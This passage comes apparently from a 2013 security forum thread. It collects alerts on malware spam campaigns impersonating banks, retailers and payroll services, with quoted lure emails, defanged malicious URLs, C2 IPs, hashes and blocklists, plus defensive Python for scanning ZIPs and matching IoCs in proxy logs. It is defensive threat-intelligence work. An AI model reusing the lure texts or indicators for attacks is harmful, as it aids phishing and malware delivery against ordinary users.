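            lower = name.lower()
            # Last extension only, so "invoice.pdf.exe" is judged by ".exe".
            ext = "." + lower.rsplit(".", 1)[-1] if "." in lower else ""
            reasons = []
            if ext in EXECUTABLE_EXTENSIONS:
                reasons.append(f"executable extension {ext}")
            if info.file_size > max_entry_bytes:
                reasons.append("oversized entry (content check skipped)")
            else:
                with zf.open(info) as fh:
                    head = fh.read(2)
                if is_pe_payload(head):
                    reasons.append("MZ header (PE executable) regardless of name")
            if reasons:
                findings.append({"name": name, "reasons": reasons})
    return findings


def build_sample_zip(entries: dict) -> bytes:
    """Constructed test data: build a ZIP in memory from {name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed archive: an MZ stub under the campaign's file name, the same
    # stub renamed to .pdf, and a harmless text file.
    sample = build_sample_zip({
        "SecureMail.exe": b"MZ\x90\x00" + b"\x00" * 60,
        "statement.pdf": b"MZ\x90\x00" + b"\x00" * 60,
        "readme.txt": b"nothing to see here",
    })
    for finding in inspect_zip(sample):
        print(finding["name"], "->", "; ".join(finding["reasons"]))
```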
AplusWebMaster
2013-05-14, 15:50
FYI...
Fake BoA SPAM / RECEIPT428-586.doc
- http://blog.dynamoo.com/2013/05/bank-of-america-spam.html
14 May 2013 - "This fake Bank of America message has a malicious Word document attached:
Date: Tue, 14 May 2013 10:16:05 +0500 [01:16:05 EDT]
Subject: Your transaction is completed
Transaction is completed. $51317477 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Receipt of payment is attached.
*** This is an automatically generated email, please do not reply ***
Bank of America, N.A. Member FDIC. Equal Housing Lender Opens in new window
© 2013 Bank of America Corporation. All rights reserved
The attached document is RECEIPT428-586.doc which contains a CVE-2012-0158 / MS12-027 exploit, so a fully patched Windows system should be immune. Further analysis is pending, but the payload is likely to be P2P / Gameover Zeus as found in this attack*. VirusTotal detections stand at just 11/46**. Further analysis is pending."
* http://blog.dynamoo.com/2013/05/citibank-spam-statement-id-64775-4985doc.html
** https://www.virustotal.com/en/file/a13ec5a6e7762b60882227640b57a32acd711fb6c706eabd1b9613e937e3e356/analysis/
File name: RECEIPT428-586.doc
Detection ratio: 18/43
Analysis date: 2013-05-14
___
Something evil on 94.242.198.16
- http://blog.dynamoo.com/2013/05/something-evil-on-9424219816.html
14 May 2013 - "I'm not entirely sure what this is, I think it's an injection attack leading to a malware server on 94.242.198.16 (Root SA, Luxembourg) which is using various stealth techniques to avoid detection. This is what I'm seeing.. code is getting injected into sites referring to [donotclick]fryzjer .me/hpoxqnj.php (report*) or [donotclick]stempelxpress .nl/vechoix.php (report**) which (if called in the correct way) tries to forward the victim to
[donotclick]ice.zoloni-kemis .info/lyxtp?ftqvixid=94764 or [donotclick]ice.zoloni-kemis .info/lifym?ftypyok=947645 hosted on 94.242.198.16.
VirusTotal reports this as a bad IP***, and out of several domains associated with this IP, almost all are red-flagged by Google for malware. The site contains several subdomains of the following domains.. I would recommend the following blocklist: [IP and domain list omitted; see the dynamoo URL below] ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=2455754
** http://urlquery.net/report.php?id=2455905
*** https://www.virustotal.com/en/ip-address/94.242.198.16/information/
- https://www.google.com/safebrowsing/diagnostic?site=AS:5577
"... over the past 90 days, 50 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-05-14, and the last time suspicious content was found was on 2013-05-14... Over the past 90 days, we found 30 site(s) on this network... that appeared to function as intermediaries for the infection of 131 other site(s)... We found 282 site(s)... that infected 4631 other site(s)..."
___
Malicious Dun and Bradstreet Compliant Spam
- http://threattrack.tumblr.com/post/50425045511/malicious-dun-and-bradstreet-compliant-spam
14 May 2013 - "Subjects Seen:
FW : Complaint - [removed]
Typical e-mail details:
Dun & Bradstreet has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
In the interest of time and good customer relations, please provide the DnB with written verification of your position in this matter by May 18, 2013. Your prompt response will allow DnB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter.
The Dun & Bradstreet develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company.
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Malicious URLs
mail.yaklasim .com:8080/forum/viewtopic.php
116.122.158.195 :8080/forum/viewtopic.php
hurricanestormsavings .com/ponyb/gate.php
hurricanestrengthsavings .com/ponyb/gate.php
62.233.104.156 /tHjefFt.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bd23b23e8cedc32ce98c9e6b66835591/tumblr_inline_mmspwolB071qz4rgp.png
AplusWebMaster
2013-05-15, 13:58
FYI...
Fake ‘Free Media Player’ via rogue ‘Adobe Flash Player HD’ ad ...
- http://blog.webroot.com/2013/05/15/fake-free-media-player-distributed-via-rogue-adobe-flash-player-hd-advertisement/
May 15, 2013 - "Our sensors just picked up a rogue advertisement served through the Yieldmanager ad network, which exposes users to fake Adobe Flash Player HD ads, ultimately dropping a copy of the potentially unwanted application (PUA)/adware, known as Somoto Better Installer...
Sample screenshot of the actual advertisement:
> https://webrootblog.files.wordpress.com/2013/05/fake_flash_player_hd_02_adware_somoto.png?w=869
... once users click, they’re presented with a rogue Free Media Player page, instead of an Adobe Flash Player HD themed page. Users who fall victim to the social engineering scam will end up installing multiple potentially unwanted applications... Landing domain:
hxxp ://www.softigloo .com – 78.138.105.151. Responding to the same IP is also the following typosquatted domain – hxxp ://down1oads .com...
Detection rate for the sampled malware:
MD5: 3ee49800cc3c2ce74fa63e6174c81dff * ... Somoto BetterInstaller; Adware.Somoto
MD5: b57cc4b5aecd69eb57063f4de914d4dd ** ... Somoto BetterInstaller; TROJ_GEN.F47V0429 ...
And initiates the following TCP connections:
78.138.97.8 :80
54.239.158.55 :80
78.138.127.129 :80
54.239.158.183 :80
54.239.158.247 :80
78.138.127.7 :80
The affiliate network participant that’s abusing the Yieldmanager ad network is currently earning revenue through the Somoto’s BetterInstaller PPI (Pay-Per-Install) revenue sharing network..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/826b5b15c89eb70d8459bb26a4faefdf505e3baae76bb6dd49289aa96d72217a/analysis/1368314633/
File name: VLCMediaPlayerSetup-9Kf76Wv.exe
Detection ratio: 8/46
Analysis date: 2013-05-11
** https://www.virustotal.com/en/file/2e0d7b543e5471f9bff7ec7f9121658d0e8fd588238f7c0b98c9e863061fc0ba/analysis/1368314918/
File name: 7ZipSetup-aVEkw5Y.exe
Detection ratio: 8/46
Analysis date: 2013-05-11
Removal Guide for Somoto.BetterInstaller
> http://forums.spybot.info/showthread.php?68498-Manual-Removal-Guide-for-Somoto-BetterInstaller&highlight=Somoto%92s+BetterInstaller
2013-05-08
___
Malicious FedEx SPAM delivers trojan ...
- http://www.hotforsecurity.com/blog/spam-posing-as-fedex-e-mail-delivers-gamarue-trojans-instead-of-packages-6173.html
May 15, 2013 - "A new wave of malicious FedEx spam delivers Trojans instead of packages, infecting users with malware when opening the attachments. In the last couple months, the Gamarue Trojan has spread intensely in the US, Australia, Croatia, Romania, Iran, the UK, Germany and Spain...
Screenshot1: http://www.hotforsecurity.com/wp-content/uploads/2013/05/spam-posing-as-fedex-e-mail-delivers-gamarue-trojans-instead-of-packages-1.jpg
... To give credibility to the malicious payload, scammers added links to the authentic shipping company. Trojan.Gamarue silently installs itself on the system, sending sensitive information to the command and control center. The stolen data can then be used for identity theft and other cyber-criminal activities. Gamarue can also download and execute arbitrary files, performing updates without users noticing. The malicious software can also spread to removable drives, so users should be careful when managing important documents through USB devices...
Screenshot2: http://www.hotforsecurity.com/wp-content/uploads/2013/05/spam-posing-as-fedex-e-mail-delivers-gamarue-trojans-instead-of-packages-2.png
FedEx is a common target for cyber-criminals, who only change the bait from time to time. Other excuses to ship malware include parcel delivery notifications. Scammers also request money in return for delivery of a package by posing as representatives of the shipping service. They also go so far as to create spoofed web sites to collect usernames, passwords, Social Security Numbers, credit card details and more..."
___
Fake Facebook SPAM / otophone .net
- http://blog.dynamoo.com/2013/05/facebook-spam-otophonenet.html
15 May 2013 - "This fake Facebook spam leads to malware on otophone .net:
Date: Tue, 14 May 2013 15:29:24 -0500 [05/14/13 16:29:24 EDT]
From: Facebook [notification+LTFS15RDTR @facebookmail .com]
Subject: Jonathan Rogers wants to be friends on Facebook
facebook
Jonathan Rogers wants to be friends with you on Facebook Facebook...
1083 friends · 497 photos · 2 notes · 1535 Wall posts
Confirm Friend Request
See All Requests
This message was sent to dynamoo @spamcop .net. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 417 P.O Box 10005 Palo Alto CA 96303
The link in the email goes through a legitimate hacked site and then ends up on a malware landing page at [donotclick]otophone .net/news/appreciate_trick_hanging.php (report here*) hosted on the following IPs:
36.224.16.74 (Chunghwa Telecom, Taiwan)
108.5.125.134 (Verizon, US)
198.61.147.58 (Matt Martin Real Estate Management / Rackspace, US)...
Blocklist:
36.224.16.74
108.5.125.134
198.61.147.58 ..."
* http://urlquery.net/report.php?id=2474662
___
Something evil on 184.95.51.123
- http://blog.dynamoo.com/2013/05/something-evil-on-1849551123.html
15 May 2013 - "184.95.51.123 (Secured Servers LLC, US) appears to be trying to serve the Blackhole Exploit kit through an injection attack (for example). The payload appears to be 404ing when viewed in the automated tools I am using, but indications are that the malware on this site is still very much live. The domains on this server belong to a legitimate company, Lifestyle exterior Products, Inc. of Florida who are probably completely unaware of the issue.
These following domains are all flagged by Google as being malicious, and are all based on 184.95.51.123. I would recommend blocking the IP if you can..."
___
Malicious DocuSign Payroll Spam
- http://threattrack.tumblr.com/post/50498753152/malicious-docusign-payroll-spam
15 May 2013 - "Subjects Seen:
Completed: Please DocuSign this document : Payroll May 2013..pdf
Typical e-mail details:
Your document has been completed
Sent on behalf of [removed].
All parties have completed the envelope ‘Please DocuSign this document: Payroll April 2013..pdf’.
To view or print the document download the attachment .
(self-extracting archive, Adobe PDF)
This document contains information confidential and proprietary to [removed]
Malicious URLs
mail.yaklasim .com:8080/forum/viewtopic.php
116.122.158.195 :8080/forum/viewtopic.php
lifestylehomeowners .com/ponyb/gate.php
lifestylehurricaneguide .com/ponyb/gate.php
parpaiol a.com/0nWhFjZ.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bbec0d266108d30e96b107c7f707e11f/tumblr_inline_mmuhuxrAIV1qz4rgp.png
___
Fake ADP SPAM / outlookexpres .net
- http://blog.dynamoo.com/2013/05/adp-spam-outlookexpresnet.html
15 May 2013 - "This fake ADP spam leads to malware on outlookexpres .net:
Date: Wed, 15 May 2013 22:39:26 +0400
From: "donotreply @adp .com" [phrasingr6 @news.adpmail .org]
Subject: adp_subj
ADP Instant Warning
Report #: 55233
Respected ADP Client May, 15 2013
Your Processed Transaction Report(s) have been uploaded to the website:
Sign In here
Please see the following information:
• Please note that your bank account will be charged within 1 business banking day for the sum shown on the Statement(s).
• Please don't try to reply to this message. automative notification system not configured to accept incoming email. Please Contact your ADP Benefits Expert.
This email was sent to existing users in your company that access ADP Netsecure.
As every time, thank you for using ADP as your business affiliate!
Rep: 55233 [redacted]
The link in the spam email goes through a legitimate but hacked site and ends up on a malware landing page at [donotclick]outlookexpres .net/news/estimate_promising.php (report here*) hosted on the same IPs found in this attack:
36.224.16.74 (Chunghwa Telecom, Taiwan)
108.5.125.134 (Verizon, US)
198.61.147.58 (Matt Martin Real Estate Management / Rackspace, US)
Blocklist:
36.224.16.74
108.5.125.134
198.61.147.58 ..."
* http://urlquery.net/report.php?id=2479638
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Scanned Document Attachment E-mail Messages - 2013 May 15
Fake Product Order E-mail Messages - 2013 May 15
Fake Document Sharing Notification E-mail Messages - 2013 May 15
Fake Invoice Statement Attachment E-mail Messages - 2013 May 15
Malicious Attachment E-mail Messages - 2013 May 15
Fake Delta E-Ticket Attachment E-mail Messages - 2013 May 15
Fake Third Party Consumer Complaint Notification E-mail Messages - 2013 May 15
Fake Portuguese Invoice Notification E-mail Messages - 2013 May 15
Fake Photo Sharing E-mail Messages - 2013 May 15
Fake Product Order Request E-mail Messages - 2013 May 15
Fake Xerox Scan Attachment E-mail Messages - 2013 May 15
Malicious Attachment E-mail Messages - 2013 May 15
(More info and links at the cisco URL above.)
:fear::mad:
AplusWebMaster
2013-05-16, 16:57
FYI...
Fake "Invoice Copy" SPAM / invoice copy.zip
- http://blog.dynamoo.com/2013/05/invoice-copy-spam-invoice-copyzip.html
16 May 2013 - "This fake invoice email contains a malicious attachment:
Date: Thu, 16 May 2013 00:27:41 -0500 [01:27:41 EDT]
From: Karen Parker [Kk.parker @tiffany .com]
Subject: invoice copy
Kindly open to see export License and payment invoice attached,
meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if
there is any problem.
Thanks
Karen parker
The attachment is invoice copy.zip which in turn contains an executable invoice copy.exe which has an icon to make it look like a spreadsheet. VirusTotal results are a pretty poor 7/45* and indicate that this is a Zbot variant. The Comodo CAMAS report** indicates that the malware seems to be rummaging through address books and gives the following characteristics:
Size 331776
MD5 ebdcd7b8468f28932f235dc7e0cd8bcd
SHA1 a3d251b8f488ef1602e7016cb1f51ffe116d7917
SHA256 4b15971cf928a42d44afdf87a517d229e4aabbb5967cb9230a19592d2b939fe6
... The ThreatTrack report*** is nicely detailed and gives some details about network connections... As ever, blocking EXE-in-ZIP files at the perimeter is the best way to guard against this type of threat."
* https://www.virustotal.com/en/file/4b15971cf928a42d44afdf87a517d229e4aabbb5967cb9230a19592d2b939fe6/analysis/1368687945/
File name: invoice copy.exe
Detection ratio: 7/45
Analysis date: 2013-05-16
** http://camas.comodo.com/cgi-bin/submit?file=4b15971cf928a42d44afdf87a517d229e4aabbb5967cb9230a19592d2b939fe6
*** http://www.dynamoo.com/files/analysis_30635_ebdcd7b8468f28932f235dc7e0cd8bcd.pdf
___
Fake HMRC SPAM / VAT Returns Repot 517794350.doc
- http://blog.dynamoo.com/2013/05/hmrc-spam-vat-returns-repot-517794350doc.html
16 May 2013 - "This fake HMRC (UK tax authority) spam contains a malicious attachment:
From: noreply @hmrc .gov.uk [mailto:noreply @hmrc .gov.uk]
Sent: 16 May 2013 10:48
Subject: Successful Receipt of Online Submission for Reference 517794350
Thank you for sending your VAT Return online. The submission for reference 517794350 was successfully received on 2013-05-16 T10:45:27 and is being processed. Make VAT Returns is just one of the many online services we offer that can save you time and paperwork.
For the latest information on your VAT Return please open attached report.
The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Cable&Wireless Worldwide in partnership with MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.
The attachment is VAT Returns Repot 517794350.doc which contains an exploit which is currently being analysed. It is likely to use the same vulnerability as this attack*. VirusTotal results are just 1/46**, so either this is something completely new or it is a corrupt sample. UPDATE: ThreatTrack reports*** that the malware sample appears to make contact with the following IPs which are all dynamic IP addresses, indicating perhaps a P2P version of Zeus:
62.103.27.242
76.245.44.216
86.124.111.218
92.241.139.165
122.179.128.38
189.223.139.172
190.42.161.35 ..."
* http://blog.dynamoo.com/2013/05/bank-of-america-spam.html
** https://www.virustotal.com/en/file/c6bdbe23857c0ca054d9fbc07f53ee0187b5ab6e86fea66091171e5b4268cb25/analysis/1368697862/
File name: VAT Returns Repot 517794350.doc
Detection ratio: 1/46
Analysis date: 2013-05-16
*** http://www.dynamoo.com/files/analysis_30639_f49ba87bdcbb24ecf22f9b5b3a8c2a34.pdf
___
Fake Walmart SPAM / bestunallowable .com
- http://blog.dynamoo.com/2013/05/walmartcom-spam-bestunallowablecom.html
16 May 2013 - "This fake Walmart spam leads to malware on bestunallowable .com:
From: Wallmart.com [deviledm978 @news.wallmart .com]
Date: 16 May 2013 14:02
Subject: Thanks for your Walmart.com Order 3795695-976140
Walmart
Visit Walmartcom | Help | My Account | Track My Orders
[redacted]
Thanks for ordering from Walmart.com. We're currently processing your order.
Items in your order selected for shipping
• You'll receive another email, with tracking information, when your order ships.
• If you're paying by credit card or Bill Me Later®, your account will not be charged until your order ships. If you see a pending charge on your account prior to your items shipping, this is an authorization hold to ensure the funds are available. All other forms of payment are charged at the time the order is placed.
Shipping Information
Ship to Home
Hannah Johnson
1961 12 Rd
Orange, NC 68025-3157
USA
---
Walmart.com Order Number: 3795695-976140
Ship to Home - Standard
Items Qty Arrival Date Price
Philips UN65EH9060 50" 1080p 60Hz Class LED (Internet Connected) 3D HDTV 1 Arrives by Tue., May 21
Eligible for Free Standard Shipping to Home. $898.00
Subtotal: $898.00
Shipping: Free
Tax: $62.86
See our Returns Policy or
contact Customer Service Walmart.com Total: $960.86
Order Summary
Order Date: 05/15/2013
Subtotal: $898.00
Shipping: Free
Tax: $62.86
Order Total: $960.86
Credit card: $960.86
Billing Information
Payment Method:
Credit card
If you have any questions, please refer to help.walmart.com or reply to this email and let us know how we can help.
Thanks,
Your Walmart.com Customer Service Team...
Rollbacks Sign Up for Email Savings and Updates
Have the latest Rollbacks, hot new releases, great gift ideas and more sent right to your inbox!
©Walmart.com USA, LLC, All Rights Reserved.
The link goes through a legitimate hacked site and ends up on a malware page at [donotclick]bestunallowable .com/news/ask-index.php (report here*) hosted on:
108.5.125.134 (Verizon, US)
198.61.147.58 (Matt Martin Real Estate Management / Rackspace, US)
The WHOIS details are characteristic of the Amerika gang...
Blocklist (including nameservers):
71.107.107.11
108.5.125.134
198.50.169.2
198.61.147.58
bestunallowable.com ..."
* http://urlquery.net/report.php?id=2494957
___
More Walmart SPAM / virgin-altantic .net
- http://blog.dynamoo.com/2013/05/walmartcom-spam-virgin-altanticnet.html
16 May 2013 - "Another -variant- of this spam* is doing the rounds, this time leading to a landing page on virgin-altantic .net:
From: Wallmart.com [mailto:sculptsu @complains .wallmartmail .com]
Sent: 16 May 2013 15:35
Subject: Thanks for your Walmart.com Order 3450995-348882 ...
---
Subtotal: $898.00
Shipping: Free
Tax: $62.86
See our Returns Policy or
contact Customer Service
Walmart.com Total: $960.86
Order Summary
Order Date: 05/15/2013
Subtotal: $898.00
Shipping: Free
Tax: $62.86
Order Total: $960.86
Credit card: $960.86
Billing Information
Payment Method:
Credit card
If you have any questions, please refer to help.walmart.com or reply to this email and let us know how we can help.
Thanks,
Your Walmart.com Customer Service Team...
The malicious payload is at [donotclick]virgin-altantic .net/news/ask-index.php (report here**). IP addresses are the same as in the other attack, although obviously if you are blocking by domain you should add virgin-altantic .net too."
* http://blog.dynamoo.com/2013/05/walmartcom-spam-bestunallowablecom.html
** http://urlquery.net/report.php?id=2496275
___
Fake Wells Fargo and Citi SPAM / SecureMessage.zip and Securedoc.zip
- http://blog.dynamoo.com/2013/05/wells-fargo-and-citi-spam.html
16 May 2013 - "This fake Wells Fargo message contains a malicious attachment:
Date: Thu, 16 May 2013 23:24:38 +0800 [11:24:38 EDT]
From: "Grover_Covington @wellsfargo .com" [Grover_Covington @wellsfargo .com]
Subject: New Secure Message
Wells Fargo
Help
To Read This Message:
Look for and open SecureMessage.zip (typically at the top or bottom; location varies by email service).
Secure Message
This message was sent to : [redacted]
Email Security Powered by Voltage IBE
Copyright 2013 Wells Fargo. All rights reserved
The attachment SecureMessage.zip contains a file SecureMessage.exe which has a SHA256 of 289bd82b66ed0c66f0e6a947cb61c928275c1053fa5d2b1119828217f61365ba and is only detected by 2/45 scanning engines at VirusTotal**.
The second version is a fake Citi spam with an attachment Securedoc.zip which contains Securedoc.exe. This is the same executable with the same SHA256, just a different name.
Date: Thu, 16 May 2013 10:16:27 -0500 [11:16:27 EDT]
From: "secure.email @citi .com" [secure.email @citi .com]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, securedoc.html You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it with Internet Explorer.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Citi Secure Email Help Desk at (866) 535-2504.
First time users - will need to register after opening the attachment.
About Email Encryption - http ://www.citi .com/citi/citizen/privacy/email.htm
... the best analysis is this ThreatTrack report*... some IPs and domains worth blocking:
69.89.21.99
116.122.158.195
212.58.4.13
mail.yaklasim .com
ryulawgroup .com "
* http://www.dynamoo.com/files/analysis_30642_d5893c62d897d95a30c950cddcbdc604.pdf
** https://www.virustotal.com/en/file/289bd82b66ed0c66f0e6a947cb61c928275c1053fa5d2b1119828217f61365ba/analysis/1368718128/
File name: SecureMessage.exe
Detection ratio: 2/45
Analysis date: 2013-05-16
___
Get Free Followers! on Instagram? Get Free Malware, Survey Scams Instead
- http://blog.trendmicro.com/trendlabs-security-intelligence/get-free-followers-on-instagram-get-free-malware-survey-scams-instead/
May 16, 2013 - "The popular photosharing app Instagram is the latest social networking site targeted by the ubiquitous survey scams seen on Facebook and Twitter. This time, we found that these survey scams may also lead users to download Android malware... these Instagram followers have repetitive account names like “Tawna Tawna” and “Concetta Concetta”... Given these suspicious signs, I then checked this “Get Free Followers” picture (which is actually clickable) and was led to this page that supposedly offers the “Get Followers” app. This app is detected by Trend Micro as ANDROIDOS_GCMBOT.A, which can be used to launch malicious webpages or send SMS from the device.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/05/instagram-survey-scam-4.jpg
Whether users download the said app or not (in my case, I tried to), in the end they are redirected to your run-of-the-mill survey scams. Since Instagram can also be accessed via a PC, we tried to access the malicious website and survey scam using a desktop. Fortunately, this ruse didn’t work. Cybercriminals profit from these survey scams via ad-tracking sites, which users are redirected to before the actual survey page. Plus, these bad guys can also use the data gathered from these scams by either peddling them to other cybercriminal groups or using them in their future schemes. Facebook, Pinterest, Tumblr, and now Instagram. The people behind these scams are jumping on every popular networking site and potential engineering hooks like the Google Glass contest. To protect yourself against this scam, you must always double-check posts on your social media accounts, even if they come from friends, family members, or known acquaintances. Caution is your best defense..."
:mad: :mad:
AplusWebMaster
2013-05-17, 14:02
FYI...
e-netprotections .su ?
- https://isc.sans.edu/diary.html?storyid=15818
Last Updated: 2013-05-17 - "Like with .biz, I sometimes have the impression that .su and .cc could be sinkholed in their entirety, because the bad domains seem to vastly outnumber whatever (if any) good is running under these TLDs as well. Earlier today, ISC reader Michael contacted us with information that several PCs on his network had started to communicate with iestats .cc, emstats .su, ehistats .su, e-protections .su and a couple other domains. I was pretty sure that I had seen the latter domain on an earlier occasion in a malware outbreak, but I couldn't find it in our records .. until I only searched for "e-protections", and found e-protections .cc. This domain had been implicated back in October 2012 in a malware spree that was linked to the nasty W32.Caphaw, a backdoor/information stealer... each infected box was apparently running a slightly different version of the EXE. Anti-Virus coverage is still thin (Virustotal*), but the Heuristics of some products seem to be catching on. This sample looks more like a ransomware trojan than Caphaw, but we'll know more once we analyze all the information gathered so far..."
Partial list of IPs involved:
64.85.161.67
85.25.132.55
173.224.210.244
178.63.172.88
188.95.48.152
199.68.199.178
91.227.220.104
* https://www.virustotal.com/en/file/b19818bb463075327c6be9fd8e913c0d4bf9dff503a991cbbc670cc673db9041/analysis/
File name: dwdsrtrt
Detection ratio: 4/46
Analysis date: 2013-05-16
- https://www.abuse.ch/?p=3581
___
Malicious Wells Fargo Secure Message Spam
- http://threattrack.tumblr.com/post/50597669027/malicious-wells-fargo-secure-message-spam
16 May 2013 - "Subjects Seen:
New Secure Message
Typical e-mail details:
View attachment for details
To Read This Message:
Look for and open SecureMessage.zip (typically at the top or bottom; location varies by email service).
Malicious URLs
mail.yaklasim .com:8080/forum/viewtopic.php
116.122.158.195 :8080/forum/viewtopic.php
mylifestylestormproducts .com/forum/viewtopic.php
mysafefloridahomelife .com/forum/viewtopic.php
ryulawgroup .com/Gsdw1.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/fb3e5e3449eb83ff06490237ae80520d/tumblr_inline_mmwrmi4bl91qz4rgp.png
___
Malicious "Referral link" SPAM / rockingworldds .net and parishiltonnaked2013 .net
- http://blog.dynamoo.com/2013/05/referral-link-spam-rockingworlddsnet.html
17 May 2013 - "This spam comes from a hacked AOL email account and leads to malware on 62.76.190.11:
From: [AOL sender]
Sent: 17 May 2013 14:12
To: [redacted]
Subject: [AOL screen name]
Subject :RE ( 8 )
Sent: 5/17/2013 2:11:53 PM
referral link
http ://printcopy.co .za/elemqi.php?whvbcfm
The link goes through a legitimate -hacked- site and in this case ends up at [donotclick]rockingworldds .net/sword/in.cgi?6 (report here*) which either -redirects- to a weight loss spam site or alternatively a malware landing page at [donotclick]parishiltonnaked2013 .net/ngen/controlling/coupon_voucher.php (report here**) which appears to load the BlackHole Exploit Kit. Both these sites are hosted on 62.76.190.11 (Clodo-Cloud / IT House, Russia)... I have several IPs blocked in the 62.76.184.0/21 range, you may want to consider blocking the entire lot if you don't have any reason to send web traffic to Russia."
* http://urlquery.net/report.php?id=2512341
** http://urlquery.net/report.php?id=2512431
___
Fake Newegg .com SPAM / balckanweb .com
- http://blog.dynamoo.com/2013/05/neweggcom-spam-balckanwebcom.html
17 May 2013 - "This fake Newegg.com spam leads to malware:
Date: Fri, 17 May 2013 10:29:20 -0600 [12:29:20 EDT]
From: Newegg [info @newegg .com]
Subject: Newegg.com - Payment Charged
Priority: High Priority 1
Newegg logo
My Account My Account | Customer Services Customer Services
Twitter Twitter You Tube You Tube Facebook Facebook Myspace Myspace
click to browse e-Blast click to browse Shell Shocker click to browse Daily Deals
Computer Hardware PCs & Laptops Electronics Home Theater Cameras Software Gaming Cell Phones Home & Office MarketPlace Outlet More
Customer ID: [redacted]
Account Number: 23711731
Dear Customer,
Thank you for shopping at Newegg.com.
We are happy to inform you that your order (Sales Order Number: 97850177) has been successfully charged to your AMEX and order verification is now complete.
If you have any questions, please use our LiveChat function or visit our Contact Us Page.
Once You Know, You Newegg.
Your Newegg.com Customer Service Team
ONCE YOU KNOW, YOU NEWEGG. ®
Policy and Agreement | Privacy Policy | Confidentiality Notice
Newegg.com, 9997 Rose Hills Road, Whittier, CA. 90601-1701 | © 2000-2013 Newegg Inc. All rights reserved.
Screenshot: https://lh3.ggpht.com/-Si0jHOHqviw/UZZqyHxGvPI/AAAAAAAABOY/5HZq7dloGwE/s1600/newegg.png
In the version I have the link doesn't work, but I believe that it goes to [donotclick]balckanweb .com/news/unpleasant-near_finally-events.php (report here*) hosted or having nameservers on the following IPs:
5.231.24.162 (GHOSTnet, Germany)
71.107.107.11 (Verizon, US)
108.5.125.134 (Verizon, US)
198.50.169.2 (OVH, Canada)
198.61.147.58 (Matt Martin Real Estate Management / Rackspace, US)
209.59.223.119 (Endurance International Group, US)
The domains and IPs indicate that this is part of the "Amerika" spam run.
Blocklist (including nameservers):
5.231.24.162
71.107.107.11
108.5.125.134
198.50.169.2
198.61.147.58
209.59.223.119 ..."
* http://urlquery.net/report.php?id=2504632
Also at: http://threattrack.tumblr.com/post/50671403152/malicious-newegg-order-spam
May 17, 2013
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4122a83db45982e54ded798906a63447/tumblr_inline_mmyl9yAwpg1qz4rgp.png
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Product Order Quotation Attachment E-mail Messages - 2013 May 17
Fake Product Order E-mail Messages - 2013 May 17
Fake Purchase Order E-mail Messages - 2013 May 17
Fake Account Compromise Notification E-mail Messages - 2013 May 17
Fake Scanned Document Attachment E-mail Messages - 2013 May 17
Fake Social Media User Notification E-mail Messages - 2013 May 17
Fake Facebook Security Software E-mail Messages - 2013 May 17
Fake Incoming Fax Message E-mail Messages - 2013 May 17
Fake Document Sharing E-mail Messages - 2013 May 17
Fake Italian Shared Document E-mail Messages - 2013 May 17
Fake Invoice Statement Attachment E-mail Messages - 2013 May 17
Fake Money Transfer Notification E-mail Messages - 2013 May 17
Fake Xerox Scan Attachment E-mail Messages - 2013 May 17
(More detail and links at the cisco URL above.)
:mad:
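The dynamoo and ThreatTrack posts quoted above all end in a blocklist written in defanged form ("otophone .net", "116.122.158.195 :8080/forum/viewtopic.php", "[donotclick]host .tld/path", the 62.76.184.0/21 range). Below is an added example, not code from any of the quoted blogs, of how a defender can turn those entries into something a proxy log can be checked against: it re-fangs the entries, sorts them into IP networks, domains and host/path URLs, and then runs a few constructed proxy log lines through the list. The log lines, client addresses and timestamps are made up for the example; the IoCs are copied from the posts above. Domain matching is done on label boundaries so that an unrelated domain ending in the same string does not match.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Blocklist entries copied from the posts above, in the defanged form the blogs
# use: "otophone .net", "116.122.158.195 :8080/...", "[donotclick]host .tld/path".
DEFANGED_IOCS = [
    "otophone .net",
    "virgin-altantic .net",
    "[donotclick]outlookexpres .net/news/estimate_promising.php",
    "116.122.158.195 :8080/forum/viewtopic.php",
    "36.224.16.74",
    "62.76.184.0/21",
]

# Constructed proxy log lines (timestamp, client IP, method, URL); not real traffic.
SAMPLE_LOG = """\
1368716400.123 10.0.0.5 GET http://www.example.com/index.html
1368716401.456 10.0.0.7 GET http://otophone.net/news/appreciate_trick_hanging.php
1368716402.789 10.0.0.9 GET http://116.122.158.195:8080/forum/viewtopic.php
1368716403.001 10.0.0.9 GET http://62.76.190.11/sword/in.cgi?6
1368716404.222 10.0.0.5 GET http://www.virgin-altantic.net/news/ask-index.php
1368716405.333 10.0.0.8 GET http://notvirgin-altantic.net/
"""


def refang(ioc: str) -> str:
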